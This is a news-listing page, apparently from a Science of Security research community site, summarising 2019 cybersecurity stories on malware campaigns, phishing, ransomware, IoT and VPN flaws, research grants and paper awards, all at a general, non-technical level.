News Items

  • news

    Visible to the public Winner of 7th Paper Competition is Evaluating Fuzz Testing

    The winning paper is Evaluating Fuzz Testing by George Klees, Andrew Ruef, Benji Cooper, Shiyi Wei, and Michael Hicks. This paper was presented at ACM SIGSAC Conference on Computer and Communications Security (CCS '18) in Toronto.

  • news

    Visible to the public NSA Launches Latest Codebreaker Challenge

    By Betsy Stein NSA/CSS Communications Officer

    FORT MEADE, MD, Sept. 20, 2019 --

    Are you a U.S. undergraduate or graduate student interested in attempting to crack a cyber-challenge similar to those that regularly threaten national security? Then sign up for the 2019 NSA Codebreaker Challenge!

  • news

    Visible to the public NIST Releases Draft Security Feature Recommendations for IoT Devices

    NIST Releases Draft Security Feature Recommendations for IoT Devices

    "Core Baseline" guide offers practical advice for using everyday items that link to computer networks.

    August 01, 2019

  • news

    Visible to the public NSA-approved cybersecurity law and policy course now available online

    NSA-approved cybersecurity law and policy course now available online

    Cyber Scoop

    Shannon Vavra

    August 27th, 2019

    Anyone who is interested in cybersecurity law and policy can now take an online course that was partly shaped by National Security Agency.

  • news

    Visible to the public Game-theoretic Paper Wins Annual Paper Competition

    The winner of the 6th Annual Best Scientific Cybersecurity Paper Competition is How Shall We Play a Game? A Game-theoretical Model for Cyber-warfare Games by Tiffany Bao, Yan Shoshitaishvili, Ruoyu Wang, Christopher Kruegel, Giovanni Vigna, and David Brumley. These researchers are from Carnegie Mellon University and University of California, Santa Barbara. This paper was originally accepted at 30th IEEE Computer Security Foundations Symposium (CSF '17).

    To learn more visit the competition homepage: https://cps-vo.org/group/sos/papercompetition/pastcompetitions

  • news

    Visible to the public NSA SoS Lablet Call for Proposals is Open

    The National Security Agency has distributed its BAA (really a request for proposals) for its next generation of SoS Lablets. These lablets include lablets on the 5 Hard Problem areas in Science of Security, on the Science of Privacy and dealing with Cyber Physical Systems. Proposals are due August 21. While the SoS team is not the point of contact for the contracting process, we can aid in directing: https://cps-vo.org/group/SoS/contact

  • news

    Visible to the public "Facebook’s Bug Bounty Gets Bigger for Third-Party Apps"

    In an effort to improve Facebook's security and privacy, the social media giant will enhance its bug bounty programs by allowing security researchers to actively search for vulnerabilities in third-party apps and websites that integrate with its platform. Instead of passively observing third-party apps and websites for vulnerabilities, security researchers will be able to test the apps and websites for security flaws. However, they must have permission from the third-party to do so. Allowing security researchers to take on a more active approach will result in the discovery of more vulnerabilities as they would be able to look at the different ways in which a third-party app could be exploited by attackers to abuse a user's data. In addition, those that discover rare security vulnerabilities will be rewarded with a $15,000 bonus. This article continues to discuss the expansion of Facebook's bug bounty programs.

    CNET reports "Facebook's Bug Bounty Gets Bigger for Third-Party Apps"

  • news

    Visible to the public "New Cryptomining Malware Uses WAV Audio Files to Conceal Its Tracks"

    Security researchers from Cylance have discovered the use of a steganography technique in a new campaign aimed at distributing cryptomining malware. Steganography is a technique that can be used by hackers to covertly deliver malware in or by way of formats that conceal the distribution of the malware, such as image files, video files, and other unsuspecting multimedia containers. This technique differs from cryptography by concealing the delivery of malicious data instead of the data itself. Steganography remains an effective method for hackers because most users would not suspect a multimedia container such as a digital image to consist of malware. In this case, researchers found that cybercriminals have been hiding cryptomining malware in WAV files. This article continues to discuss the the steganography technique employed in the new cryptomining campaign.

    TNW reports "New Cryptomining Malware Uses WAV Audio Files to Conceal Its Tracks"

  • news

    Visible to the public "Silent Librarian Retools Phishing Emails to Hook Student Credentials"

    The threat group known as Silent Librarian, TA407, or Cobalt Dickens, has been discovered to be using new tactics in an updated phishing campaign. Silent Librarian targets university students to steal student login credentials. According to researchers at Proofpoint, the group's recent campaign uses shortened URL links in phishing emails to make it increasingly difficult to detect the phishing attempt. These URLs redirect victims to revamped attacker-hosted landing pages that display university-specific banners, consisting of notifications about emergencies or the weather. This article continues to discuss the operations, new tactics, targets, and impact of the Silent Library threat group.

    Threatpost reports "Silent Librarian Retools Phishing Emails to Hook Student Credentials"

  • news

    Visible to the public "A new Mac Malware Dubbed Tarmac has Been Distributed via Malvertising Campaigns"

    It has been discovered that malvertising campaigns are distributing MacOS malware combining both Shlayer and Tarmac malware. The malvertising campaigns have targeted users located in the US, Italy, and Japan. When a user clicks on a malicious ad, the ad then redirects the victim to sites showing popups peddling software updates, mainly Adobe Flash Player updates, that once executed will install first the OSX/Shlayer MacOS malware, which then execute the final payload, the OSX/Tarmac. Tarmac acts as a second-stage payload for the Shlayer infection.

    Cyber Defense Magazine reports: "A new Mac Malware Dubbed Tarmac has Been Distributed via Malvertising Campaigns"

  • news

    Visible to the public "FIN7 Gang Returns With New Malicious Tools"

    The financially-motivated hacking group, FIN7, is back with new malicious tools. FIN7 hackers are known for targeting businesses, including fast-food restaurants, hotels, and casinos for the purpose of stealing payment data such as credit card numbers. They have installed customized malware on point-of-sale (PoS) machines and IT networks using spear-phishing techniques. According to researchers at FireEye, the hacking group is now deploying a new dropper, called Boostwrite, which is capable of circumventing detection by using valid certification. Boostwrite delivers a new payload, called Rdfsniffer, to interfere with remote administrative tools used to fix payment systems and PoS machines. This article continues to discuss the FIN7 hacking group in relation to its newly discovered malicious tools and techniques.

    BankInfoSecurity reports "FIN7 Gang Returns With New Malicious Tools"

  • news

    Visible to the public "Beyond Testing: The Human Element of Application Security"

    According to Veracode's recent State of Software Security (SOSS) report, the analysis of results from more than 700,000 applications scans revealed that 83 percent of the applications contained one or more vulnerabilities. These results call for the improvement of application security with human solutions. In order for an application security program to be effective, the role of the human in the security process must be enhanced. Experts have recommended that developers receive training on secure coding. In addition, organizations are encouraged to establish bug bounty programs and strong vulnerability disclosure policies to allow outside security researchers to find vulnerabilities in their software and properly disclose the security risks that they have discovered. This article continues to discuss the importance of improving application security, secure code training, vulnerability disclosure policies, and bug bounty programs.

    Security Boulevard reports "Beyond Testing: The Human Element of Application Security"

  • news

    Visible to the public "Protecting Smart Machines From Smart Attacks"

    A team of researchers at Princeton University conducted studies on how adversaries can attack machine learning models. As the application of machine learning grows, it is important that we examine the different ways in which this technology can be exploited by attackers to develop countermeasures against them. The researchers demonstrated different adversarial machine learning attacks, which include data poisoning attacks, evasion attacks, and privacy attacks. Data poisoning attacks occur when an adversary inserts bad data into an AI system's training set. Evasion attacks refer to the manipulation of an input so that it appears normal to a human, but can be incorrectly classified by the machine learning model. Privacy attacks are performed when adversaries try to expose sensitive information using data learned by the machine learning model. This article continues to discuss the importance of exploring the vulnerabilities of machine learning technologies and the adversarial machine learning attacks demonstrated by researchers.

    Princeton University reports "Protecting Smart Machines From Smart Attacks"

  • news

    Visible to the public "Fake Mobile app Fraud Tripled in First Half of 2019"

    During a study of Quarter 2 of 2019, RSA Security identified 57,406 total fraud attacks worldwide. Of these, phishing attacks were the most prevalent (37%), followed by fake mobile apps (usually apps posing as those of popular brands). Adversaries using phishing attacks went up by 6 percent between 1st half of 2019 and 2nd half of 2018. Attacks using financial malware and rogue mobile apps have increased significantly between 1st half of 2019 and 2nd half of 2018. Adversaries use of financial malware increased 80 percent and Rogue mobile apps use increased 191 percent.

    Help Net Security reports: "Fake Mobile app Fraud Tripled in First Half of 2019"

  • news

    Visible to the public "How Do We Ensure GNSS Security Against Spoofing?"

    The Global Navigation Satellite System (GNSS) refers to satellite navigation systems that provide positioning, navigation, and timing (PNT) services with global coverage. If the GNSS were to suffer a major outage for one day, it would cost the U.S. an estimated $1 billion in damage as this system is relied upon for automation, efficiency, and safety. All of the ways in which the GNSS can be exploited by attackers must be further explored in order to improve the security of this system against attacks such as GPS spoofing. GPS spoofing occurs when an attacker interferes with legitimate GPS signals using a radio transmitter that is near a target. In the context of military combat, an adversary could execute GPS spoofing attacks to manipulate GPS receivers, which could lead to the hijacking of autonomous vehicles and robotic devices. This article continues to discuss the concept of GPS/GNSS spoofing, incidents of GPS spoofing, the different types of spoofing, and how receivers can be protected against spoofing attacks.

    GPS World reports "How Do We Ensure GNSS Security Against Spoofing?"

  • news

    Visible to the public "Mathematicians Prove That Flash-Memory 'Fingerprints' of Electronic Devices Are Truly Unique"

    Mathematicians at RUDN University have proven that the defects in flash memory cells can be used as fingerprints for memory chips. This method will strengthen the security of electronic devices against hacks. The growth of devices such as smartphones, fitness bracelets, and memory devices continues to raise concerns about the theft and unauthorized alteration of these devices. Devices can be identified through the use of virtual or physical methods in which unique numbers are hard written into devices and fluctuations of a device's radio frequency act as the identifiers. However, these methods are still subject to tampering in that software can be hacked and interference with radio signals can occur. The new method of physical identification involves the use of microscopic manufacturing defects that result in damaged flash memory cells. As patterns of microdefects are truly unique, they can be used to distinguish one device from another. This article continues to discuss existing device identification methods, the new method of physical identification based on damaged flash memory cells, and how experts from RUDN University verified the effectiveness of this method.

    TechXplore reports "Mathematicians Prove That Flash-Memory 'Fingerprints' of Electronic Devices Are Truly Unique"

  • news

    Visible to the public "AI Development has Major Security, Privacy and Ethical Blind Spots"

    In a new study, it has been discovered that the most serious blind spot during AI development is security. Nearly three-quarters (73%) of respondents in the study, indicated they don't check for security vulnerabilities during model building. More than half (59%) of organizations also don't consider fairness, bias or ethical issues during ML development. It was also found that privacy is similarly neglected, with only 35% checking for issues during model building and deployment. The majority (55%) of developers mitigate against unexpected outcomes or predictions, but this still leaves a large number who don't. Of the respondents, 16% don't check for any risks at all during development.

    Help Net Security reports: "AI Development has Major Security, Privacy and Ethical Blind Spots"

  • news

    Visible to the public "NAU Cyberengineering Team Wins $6M Grant to Develop Computing Solutions to Combat Cyberattacks"

    The U.S. Air Force has awarded a $6.3 million grant to a team of researchers at Northern Arizona University. The grant was given to support the development of novel solutions to the growing sophistication and frequency of cyberattacks as well as the increasing threat posed by cyber warfare. The researchers will explore the possible ways in which hackers can be defeated through the use of new hardware technologies as traditional protection methods such as using virus detection and firewalls have been proven to be insufficient. Key technology modules will be developed by researchers, which will introduce new types of protection in the realms of cryptography, physical unclonable functions, blockchain, and key distribution. This project is expected to help improve the security of power plants, transportation systems, medical devices, and more. This article continues to discuss the support, goals, and structure of the NAU-led research project.

    NAU reports "NAU Cyberengineering Team Wins $6M Grant to Develop Computing Solutions to Combat Cyberattacks"

  • news

    Visible to the public "Group Said to Be Behind Attempted Campaign Hack Has Also Gone After Cybersecurity Researchers"

    The Iranian-linked hacking group that made more than 2,000 attempts to compromise email accounts associated with a U.S. presidential campaign, government officials, journalists, and prominent Iranians that live outside Iran, is also said to be targeting cybersecurity researchers. According to researchers at ClearSky Cyber Security, the group known as Charming Kitten, APT35, or Phosphorus, has been sending phishing emails to them. The hacking group also created a phishing website that appears to belong to ClearSky. In addition, the group built a fake web-mail page aimed at attacking ClearSky's clients. Such efforts have highlighted the extent to which cybercriminals may go to attack cybersecurity researchers when they try to expose hackers' operations. This article continues to discuss the attacks executed by the Iranian hacking group against cybersecurity researchers and other discoveries surrounding the group's latest activities.

    CyberScoop reports "Group Said to Be Behind Attempted Campaign Hack Has Also Gone After Cybersecurity Researchers"

  • news

    Visible to the public "New Data Analysis Approach Could Strengthen the Security of IoT Devices"

    It has been discovered that a multi-pronged data analysis approach can strengthen the security of IoT devices. One of the data analysis techniques the researchers applied during the study was an open-source freely available R statistical suite, which they used to characterize the IoT systems. They also used machine learning solutions to search for patterns in the data that were not apparent using R. The researchers also used the widely available Splunk intrusion detection tool. Using the tools stated above, the researchers identified three IP addresses that were actively trying to break into the Canberra network's devices. The researchers believe that analyzing IoT data using the approach they used, may enable security professionals to identify and manage controls to mitigate risk and analyze incidents as they occur. The researchers also hope that this research will help professionals create protocols on IoT security.

    Help Net Security Reports "New Data Analysis Approach Could Strengthen the Security of IoT Devices"

  • news

    Visible to the public "NIST is Hunting for Tech to Secure the Energy Sector’s Network"

    Efforts are being made by the U.S. National Institute of Standards and Technology's (NIST) National Cybersecurity Center of Excellence (NCCoE) to bolster the security of the Industrial Internet of Things (IIoT) attached to the nation's power grid. Through a program, NCCoE seeks to develop a solution for strengthening IIoT in a distributed energy resource environment. The flow of data from distributed energy resources (DERs), including wind turbines and solar panels, must be secured as such resources increase the vulnerability of the grid to disruption by cyberattackers. This article continues to discuss the focus and goals of the program as well as the increase in DERs that are being connected to the power grid, how such resources are introducing more threats to the grid, and other efforts to defend the grid against cyberthreats.

    NextGov reports "NIST is Hunting for Tech to Secure the Energy Sector's Network"

  • news

    Visible to the public "NIST and Microsoft Partner to Improve Enterprise Patching Strategies"

    Microsoft and the U.S. NIST National Cybersecurity Center of Excellence (NCCoE) will team up to help enterprises improve their security patch management strategies. Better patching strategies could have reduced the impact of WannaCry and NotPetya. Following these attacks, Microsoft looked into the challenges faced by customers in regard to security patches. The analysis of these challenges further emphasized the importance of establishing better industry guidance and standards for enterprise patch management. The partnership between Microsoft and the NCCoE will be in support of developing common enterprise management reference architectures, validating implementation instructions in the NCCoE lab, and more. This article continues to discuss the joint project and the importance of improving enterprise patching strategies.

    Security Week reports "NIST and Microsoft Partner to Improve Enterprise Patching Strategies"

  • news

    Visible to the public "BitPaymer Ransomware Attackers Exploit Apple Flaw to Bypass Detection"

    A zero-day flaw in iTunes for Windows and iCloud for Windows has been patched by Apple. The actual bug was contained by Bonjour, a component that comes with iTunes for Windows machines used to deliver updates and help services discover each other. According to researchers at Morphisec, the bug is an unquoted service path, which occurs when a file path to an executable service is not surrounded by quotation marks. The bug has been exploited by attackers to circumvent users' security defenses such as antivirus software and run BitPaymer ransomware, also known as IEncrypt. This article continues to discuss the zero-day flaw that was contained by the Bonjour updater in relation to what type of vulnerability it was, its exploitation by attackers to execute ransomware, and how it was addressed by Apple, in addition to the effectiveness of the exploit.

    SC Media reports "BitPaymer Ransomware Attackers Exploit Apple Flaw to Bypass Detection"

  • news

    Visible to the public "Attackers Hide Behind Trusted Domains, HTTPS"

    A new report from Webroot brings further attention to the use of HTTPS domains to host phishing attacks. Hypertext Transfer Protocol Secure (HTTPS) is the secure version of HTTP that uses the Transport Layer Security (TLS) protocol to secure connections between browsers and web servers in order to prevent the eavesdropping of users' private information, including passwords and web searches. The presence of "https" and a green padlock symbol in a browser's address bar gives users a false sense of security as there is no guarantee that the information encrypted and securely delivered by HTTPS is going to a safe destination. This article continues to discuss the use of trusted domains and HTTPS by attackers in addition to the increased targeting of older operating systems and the rise in malware variants.

    Dark Reading reports "Attackers Hide Behind Trusted Domains, HTTPS"

  • news

    Visible to the public "Combination of Techniques Could Improve Security for IoT Devices"

    A team of researchers at Penn State World Camp have developed an approach consisting of a combination of different techniques to bolster the security of Internet of Things (IoT) devices such a smart TVs, smart speakers, wearables, and home video cameras. According to one researcher, the number of IoT devices in operation will reach 20 billion by 2020, which increases the vulnerability of users to security breaches. The breach of IoT devices could pose a threat to the privacy and safety of users. The approach created by the researchers to maintain the security of IoT systems and identify attacks involves the use of statistical data, machine learning, intrusion detection tools, visualization tools, and more. This article continues to discuss the techniques and tools applied in the team's approach, as well as how this approach will help security professionals strengthen IoT device security.

    EurekAlert! reports "Combination of Techniques Could Improve Security for IoT Devices"

  • news

    Visible to the public "Hackers Bypassing Some Types of 2FA Security FBI Warns"

    It has been discovered by the FBI that some types of two-factor authentication (2FA) security can no longer be guaranteed to keep adversaries out. Their are several methods cyber actors use to circumvent popular multi-factor authentication techniques in order to obtain the one-time passcode and access protected accounts. The most common bypass method is SIM swap fraud, in which the attacker convinces a mobile network (or bribes an employee) to port a target's mobile number, allowing them to receive 2FA security codes sent via SMS text. Using any form of 2FA is still better than relying on a password and username on its own even with some being vulnerable. If one wants to have the strongest possible 2FA security, one will probably have to consider using FIDO2 hardware tokens, a technology that has yet to be undermined by hackers in real-world attacks.

    Naked Security reports: "Hackers Bypassing Some Types of 2FA Security FBI Warns"

  • news

    Visible to the public "Using Machine Learning to Hunt Down Cybercriminals"

    Researchers at MIT and the University of California at San Diego (UCSD) have developed a new machine-learning (ML) system that can be used to prevent IP hacking incidents before they occur by identifying serial IP hijackers. IP hijacking is a type of cyberattack in which cybercriminals exploit a flaw in the routing protocol for the Internet, Border Gateway Protocol (BGP). Through the performance of a BGP hijack, nearby networks can be convinced that a malicious actor's network has the best path to reach a specific IP address. The researchers gathered information from network operator mailing lists and historical BGP data to identify the common traits and behaviors of serial hijackers. Using the collected information, researchers trained their system to identify those traits and behaviors, allowing IP hacking incidents to be predicted in advance. This article continues to discuss the concept of IP hijacking, the ML system developed to detect such attacks before they occur, and the identification of false positives.

    MIT News report "Using Machine Learning to Hunt Down Cybercriminals"

  • news

    Visible to the public "Twitter Admits It Used Two-Factor Phone Numbers and Emails for Serving Targeted Ads"

    Another incident has raised concerns over the misuse of customer data by social media giants. Twitter recently admitted to using phone numbers and email addresses provided by users to enable two-factor authentication on their accounts for targeted advertising. According to a statement released by the company, this issue derived from its advertising system that allows companies to upload their own marketing list, match with Twitter users, and directly target them in their campaigns. This article continues to discuss the incident, the importance of two-factor authentication, a similar incident that was faced by Facebook last year, and other notable security mistakes made by Twitter.

    TechCrunch reports "Twitter Admits It Used Two-Factor Phone Numbers and Emails for Serving Targeted Ads"

  • news

    Visible to the public "A Controversial Plan to Encrypt More of the Internet"

    Google and Mozilla plan to encrypt a fundamental element of the Internet, the Domain Name System (DNS). Security was not considered in the design of DNS, allowing hackers to abuse weaknesses and vulnerabilities in the Internet system through a variety of different attacks such as DNS hijacking. The increase in such attacks has prompted this push to encrypt DNS. Two different methods that apply web encryption to DNS requests, called DNS over HTTPS (DoH) and DNS over TLS (DoT), have already been codified by the Internet Engineering Task Force standards body. This article continues to discuss the concept of DNS, the insecurity of DNS requests, the two protocols aimed at encrypting these requests, and concerns surrounding the encryption of DNS requests among cybersecurity professionals.

    Wired reports "A Controversial Plan to Encrypt More of the Internet"

  • news

    Visible to the public "Majority of IT Departments Leave Major Holes in Their USB Drive Security"

    In a new study, it was found that even though 87% of organizations use USB drives, the majority of IT departments aren't implementing tools to manage USB device usage. Nearly 6 out of 10 organizations (58%) do not use port control / whitelisting software to manage USB device usage. More than a quarter of organizations (26%) do not use software-based encryption, and less than half of organizations (47%) require the deployment of encryption for data stored on the USB drive. An overwhelming 91% of employees that participated in this study thought that encrypted USB drives should be mandatory.

    Help Net Security reports: "Majority of IT Departments Leave Major Holes in Their USB Drive Security"

  • news

    Visible to the public "New Report Outlines IoT Security Vulnerabilities"

    A new Internet of Things (IoT) report released by consulting and research firm, Independent Security Evaluators (ISE), details the presence of IoT security vulnerabilities in 13 popular small office/home office (SOHO) routers and network-attached storage (NAS) devices. The study of these devices resulted in 125 CVEs (Common Vulnerabilities and Exposures). According to the report, all 13 devices that were examined in this research contained one or more web app vulnerabilities. The exploitation of these vulnerabilities could allow attackers to compromise additional network devices, obtain sensitive information transmitted via devices, disable networks, and more. This article continues to discuss key findings of the IoT security report, the impact IoT security vulnerabilities, how these IoT weaknesses can be eliminated, what improvements have been made in IoT security, and the need for IoT device manufacturers to prioritize security.

    CPO Magazine reports "New Report Outlines IoT Security Vulnerabilities"

  • news

    Visible to the public "Wireless Security Institute Established at Idaho National Laboratory to Improve 5G Technology"

    5G is the next generation of wireless technology that is expected to bring improvements in regard to bandwidth, capacity, and reliability. However, the arrival of 5G networks is also expected to introduce new security vulnerabilities. As the implementation of 5G technology continues to increase, data protection technologies and 5G security protocols need to be developed and validated. Idaho National Laboratory (INL) has established the INL Wireless Security Institute to lead research conducted by government, academia, and private industry aimed at making 5G wireless technology more secure and reliable. The INL Wireless Security Institute will work with public and private leaders in the wireless communication field to prioritize security tasks and increase efforts to improve security. This article continues to discuss what it is expected of 5G wireless technology and how the INL Wireless Security Institute will support efforts towards improving this technology.

    INL reports "Wireless Security Institute Established at Idaho National Laboratory to Improve 5G Technology"

  • news

    Visible to the public "Phishing Attempts Increase 400%, Many Malicious URLs Found on Trusted Domains"

    In a news study, it has been discovered that nearly a quarter (24%) of malicious URLs are found to be hosted on trusted domains. This is done, because hackers know trusted domain URLs raise less suspicion among users and are more difficult for security measures to block. It was also discovered that 1 in 50 URLs (1.9%) were found to be malicious, which is high given that nearly a third (33%) of office workers click more than 25 work-related links per day. Nearly a third (29%) of detected phishing web pages use HTTPS as a method to trick users into believing they're on a trusted site via the padlock symbol. Phishing attempts grew rapidly, with a 400% increase in URLs discovered from January to July 2019. The top industries impersonated by phishing include: SaaS/Webmail providers (25%), financial institutions (19%), social media (16%), retail (14%), file hosting (11%), and payment services companies (8%).

    Help Net Security reports: "Phishing Attempts Increase 400%, Many Malicious URLs Found on Trusted Domains"

  • news

    Visible to the public "New Tech Aims to Tell Pilots When Their Plane Has Been Hacked"

    U.S. defense contractor, Raytheon, is developing new technology that would alert pilots in the event that their planes are being hacked. The U.S. military expects the act of hacking a plane to be a major tactic in warfare in the future. The Cyber Anomaly Detection System will give pilots details about a hacking incident in real time, which will allow them to make decisions as to what needs to be done to resolve the problem. Most aircraft have important electronics and avionics systems connected to a serial data bus, which is said to lack security in many U.S. military planes. A plane's attack surface for cyber threats grows as more technology and commercial products are added to the aircraft. This article continues to discuss a potential scenario in which a helicopter is hacked, the growing vulnerability of aviation platforms to being infiltrated by hackers, the discovery of vulnerabilities in the F-15E Stroke Eagle fighter jet, and the Cyber Anomaly Detection System aimed at alerting pilots about cyberattacks on their planes.

    Defense One reports "New Tech Aims to Tell Pilots When Their Plane Has Been Hacked"

  • news

    Visible to the public "Hacking for the Public Good"

    A panel at the Black Hat USA 2019 conference highlighted the use of hacking skills for good as hacking is often perceived as bad. It was emphasized that white-hat hackers and IT security industry groups are applying their skills in a way that bolsters digital security for the public and private sector. Ethical hacking can lead to the discovery of security vulnerabilities in products and an increase in awareness about how these vulnerabilities can be exploited by malicious actors. This article continues to discuss the importance of ethical hackers, the Electronic Frontier Foundation, the introduction of new threats, and efforts to increase understanding surrounding these threats.

    GCN reports "Hacking for the Public Good"

  • news

    Visible to the public "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn"

    The National Security Agency (NSA) and the National Cyber Centre (NCSC) in the United Kingdom issued alerts pertaining to the exploitation of vulnerabilities in outdated VPN technologies from Pulse Secure, Fortinet, and Palo Alto Networks by state-sponsored advanced persistence threat (APT) groups. According to the alerts, the exploitation of these vulnerabilities could allow APT actors to gain access to VPN devices, change configuration settings, run secondary exploits, and more. Officials recommend a number of mitigation techniques for these vulnerabilities, which include applying patches for VPNs, updating existing credentials, and using multi-factor authentication. This article continues to discuss the release of warnings about the abuse of flaws in unpatched VPNs, the vulnerabilities contained by outdated VPN technologies, and mitigation techniques recommended by officials.

    Threatpost reports "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn"

  • news

    Visible to the public "Researcher Shows How Adversaries Can Gather Intel on U.S. Critical Infrastructure"

    A researcher known as Wojciech used open source intelligence (OSINT) and a tool that he developed, called Kamerka, to demonstrate the ease at which adversaries can collect intelligence on U.S. critical infrastructure. Through the use of the Kamerka tool, Wojciech was able to discover 26,000 internet-exposed industrial control system (ICS) devices in the U.S. The tool also allowed Wojciech to determine the geographical locations of these industrial controls systems as well as the critical infrastructure targets that would be the most attractive to threat actors. Atlanta, Houston, Chicago, New York, Denver, and Philadelphia are the cities in which the highest percentage of these ICS devices were found. This article continues to discuss Kamerka's capabilities, the discovery of exposed ICS devices in the U.S., the vulnerabilities contained by such devices, and the potential use of OSINT by adversaries to perform reconnaissance on U.S. critical infrastructure.

    Security Week reports "Researcher Shows How Adversaries Can Gather Intel on U.S. Critical Infrastructure"

  • news

    Visible to the public "218 million Words With Friends Players Lose Data to Hackers"

    It has been discovered that Words With Friends, Zynga's popular multiplayer crossword-style game has been affected by a breach. The hacker/hacker group named GnosticPlayers had gotten access to details on more than 218 million users. Details of all Android and iOS game players who installed and signed up for the game on and before September 2nd 2019 was obtained. The information that was obtained include: names, email addresses, login IDs, Hashed passwords, SHA1 with salt, password reset token (if ever requested), phone numbers (if provided), Facebook ID (if connected), and Zynga account ID. Luckily it is not believed that they got any credit card information used for payments within the application.

    Naked Security reports: "218 million Words With Friends Players Lose Data to Hackers"

  • news

    Visible to the public "Research Aims to Help Social Media Users Secure Their Information"

    Researchers at the University of North Georgia (UNG) are working on developing tools aimed at helping Facebook, Twitter, and Instagram users protect their sensitive data. Dr. Ahmad Ghafarian and three UNG students are performing experiments in which the amount of information stored on computers and web browsers by social media users is examined. The researchers want to find out how easy it would be for an attacker to exfiltrate personal data when a social media user is logged into their account on a particular machine. In addition, researchers are looking for security vulnerabilities contained by popular social media platforms to develop tools to help people protect their accounts and information. This article continues to discuss the goals, activities, and support of this research.

    UNG reports "Research Aims to Help Social Media Users Secure Their Information"

  • news

    Visible to the public "Iranian Hackers Targeted a U.S. Presidential Campaign, Microsoft Says"

    Researchers from the Microsoft Threat Intelligence Center discovered more than 2,000 attempts supposedly made by Iranian hackers to compromise email accounts associated with a U.S. presidential campaign, government officials, journalists, and prominent Iranians that live outside of Iran. The hacking group, called Phosphorus, executed attacks against 241 email accounts, four of which were successfully hacked. According to researchers, the hackers were able to gain access to the four accounts by abusing password reset features using a large amount of personal information. This article continues to discuss the attempted hacks on a U.S. presidential campaign regarding their perpetrators, targets, and impact, as well as other incidents that have raised concerns surrounding the 2020 election.

    CNET reports "Iranian Hackers Targeted a U.S. Presidential Campaign, Microsoft Says"

  • news

    Visible to the public "Intel Proposes New SAPM Memory Type to Protect Against Spectre-Like Attacks"

    Intel recently published a paper in which details about a new type of computer memory were shared. The new type of CPU memory, called Speculative-Access Protected Memory (SAPM), was designed to protect against Spectre, Meltdown, Zombieload, and other speculative execution side-channel attacks. Speculative execution side-channel attacks refer to vulnerabilities deriving from the prediction of future instructions by high-performance microprocessors. Misspeculations leave traces of information behind that could be exploited via side-channels by hackers to gain access to sensitive data stored in memory. A team of researchers at Intel STORM (Strategic Offensive Research and Mitigation) have proposed the replacement of the current CPU memory system with SAPM. SAPM will work as an alternative to existing hardware and software-level mitigations. This article continues to discuss speculative side-channel attacks as well as the new SAPM memory type proposed by Intel to protect against such attacks.

    ZDNet reports "Intel Proposes New Sapm Memory Type to Protect Against Spectre-Like Attacks"

  • news

    Visible to the public "Alabama Hospitals Pay Out in Ransomware Attack Amid FBI Warning of More to Come"

    It has been discovered that Alabama-based DCH Health System paid off the hackers behind a ransomware attack that severely disrupted operations at three hospitals. The specific ransomware variant involved in the attack is called Ryuk. Ryuk has recently become a global threat. There is good evidence that Ryuk attacks may be coordinated by a single cybercrime group based out of Russia known as GRIM SPIDER. Ransomware attacks are becoming more targeted, sophisticated, and costly, even as the overall frequency of attacks remains consistent. It is suggested that one does not pay the ransom if affected by ransomware, because sometimes the attacker does not give the person affected the key to decrypt their files, and sometimes the attacker will perform a ransomware attack again on the same individual in the future, because they know that the person is more likely to pay the ransom, since they already had before.

    GIZMODO reports: "Alabama Hospitals Pay Out in Ransomware Attack Amid FBI Warning of More to Come"

  • news

    Visible to the public "How Kids Get into Hacking"

    A new study conducted by researchers from Michigan State University on the characteristics and gender-specific behaviors that lead kids to juvenile hacking. Research has focused on the scope and threat posed by hacking. However, there is a lack of understanding surrounding the background factors, social connections, and personality traits that lead to a path of hacking. Thomas Holt, lead author and MSU cybercrime expert in the School of Criminal Justice, determined the predictors for hacking by examining responses from 50,000 teens. Predictors include low self-control, negative peer-associations, and obsession with playing computer games. It was also discovered that there is a difference in predictors between boys and girls. This article continues to discuss the predictors of juvenile hacking, the differences in predictors based on gender, and how parents can encourage their kids to use their skills in a positive way.

    Homeland Security News Wire reports "How Kids Get into Hacking"

  • news

    Visible to the public "URGENT/11: FDA Issues Alert for Cyber Vulnerability That Threatens Medical Devices, Networks"

    An alert has been issued by the U.S. Food and Drug Administration (FDA) for healthcare organizations, IT professionals, device manufacturers, and patients pertaining to a collection of security vulnerabilities, called URGENT/11, that affect connected medical devices and hospital networks. According to FDA officials, the exploitation of URGENT/11 vulnerabilities could allow attackers to perform malicious activities such as hijacking medical devices remotely, changing device functions, launching denial-of-service attacks, leaking sensitive information, and more. The vulnerabilities affect at least six different operating systems including VxWorks, INTEGRITY, and ZebOS. This article continues to discuss what the abuse of URGENT/11 vulnerabilities can allow attackers to do, which operating systems are affected by the security flaws, and suggestions on how to address these vulnerabilities.

    Healthcare IT News report "Urgent/11: FDA Issues Alert for Cyber Vulnerability That Threatens Medical Devices, Networks"

  • news

    Visible to the public "Blind Spots in AI Just Might Help Protect Your Privacy"

    Significant advancements have been made in machine learning (ML) as this technology has helped in detecting cancer and predicting personal traits. ML technology has also enabled self-driving cars and highly accurate facial recognition. However, ML models remain vulnerable to attacks in which adversarial examples are used to cause the models to make mistakes. Adversarial examples are inputs designed by an attacker to cause a ML model to produce incorrect output, which can pose a threat to the safety of users in the case of self-driving cars. According to privacy-focused researchers at the Rochester Institute of Technology and Duke University, there is a bright side to adversarial examples in that such inputs can be used to protect data and defend the privacy of users. This article continues to discuss ML applications, the use of adversarial examples to disrupt the success of ML models, Facebook's Cambridge Analytic incident, the never-ending cat-and-mouse game of predicting and protecting private user data, and research surrounding the use of adversarial examples to protect data.

    Wired reports "Blind Spots in AI Just Might Help Protect Your Privacy"

  • news

    Visible to the public "WhatsApp Vulnerability Could Compromise Android Smartphones"

    Some new research has revealed that WhatsApp has a remote code execution (RCE) flaw. This flaw could be used to compromise not only the app but the mobile device the app is running on. The critical issue (CVE-2019-11932) affects users of the Android versions of the app, specifically versions 8.1 and 9.0 although not, apparently, version 8.0 (Apple's iOS doesn't appear to be affected). The attack would involve first sending a malicious GIF image using any channel, that is by email, a rival messaging app, or sent direct through WhatsApp itself. If WhatsApp is being used, and the attacker (or hapless intermediary) is on the contacts list of the user as a friend, this GIF would download to the device automatically. Execution of the flaw would happen when the recipient subsequently opens the WhatsApp Gallery even if no file is selected or sent. The exploit can allow an attacker to receive a full reverse shell, with root and complete access to all the files on that device, its SD Card, and what appears to be the WhatsApp message database.

    Naked Security reports: "WhatsApp Vulnerability Could Compromise Android Smartphones"

  • news

    Visible to the public "Alabama Hospitals Forced to Close After Ransomware Attack"

